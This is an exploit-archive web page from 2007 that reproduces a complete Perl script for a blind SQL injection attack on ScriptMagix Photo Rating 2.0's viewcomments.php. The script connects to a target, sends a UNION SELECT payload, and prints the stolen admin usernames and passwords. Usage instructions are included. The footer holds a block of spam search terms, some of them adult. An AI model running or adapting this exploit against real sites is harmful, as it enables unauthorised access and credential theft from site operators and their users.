about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , ScriptMagix Photo Rating <= 2.0 Remote SQL Injection Exploit




2007-03-18 ScriptMagix Photo Rating <= 2.0 Remote SQL Injection Exploit
Rated as : Moderate Risk

#!/usr/bin/perl
#[Script Name: ScriptMagix Photo Rating <= 2.0 (viewcomments.php)
Remote Blind SQL Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(
#[S.Page     : http://www.scriptmagix.com
#[$$         : 75$
#[..         : ajann,Turkey

use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[//   ScriptMagix Photo Rating <= 2.0 (viewcomments.php) Remote Blind
SQL Injection Exploit
[//                   Usage: exploit.pl [target]
[//                   Example: exploit.pl victim.com
[//                   Example: exploit.pl victim.com
[//                           Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/viewcomments.php?phid=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);

if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}

if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
 }


$target =
"-1%20union%20select%200,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),2,3,0,0%20from%20admin/*";
$target = $host.$dir.$file.$target;

#Writing data to socket
print
"+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr
=> "$server", PeerPort => "$port") || die
"\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

if ($answer =~ /password:(.*?)<\/td>/){
print "+ Password: $1\n";
}

if ($answer =~ /Syntax error/) { 
print "+ Exploit Failed : ( \n";
print
"+**********************************************************************+\n";
exit(); 
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : (  \n";
print
"+**********************************************************************+\n";
exit(); 
}
 }

securitydot.net - 2007-03-18

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 06:23:14 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
iibuduhege www.banatf php-nuke 2 password k SEX VIDEO shop .aspx hotegirl sex videc 200 /compo hotegirl telugu sex blackbarba WWW.SEX.VI Indiafm.Co vediosaxy www.mt1800 Tites Apache 2. SXEY ASS SSH Server iipupaduxy www.18qt.c celebrity SXEY ASS SSH Server Wallpapers 178118.com postfix sm Pict PUSSIE.COM WWWSIX www.sina-v Www.free4m 450apb Www.smartv MILKJUNKI Sexbac www.mt1800 Www.holywo Porn thail urdailynee Sexvideo Microsoft wwww.myvdn siran www.dowelm www.89. news for C Www.arbsex news for C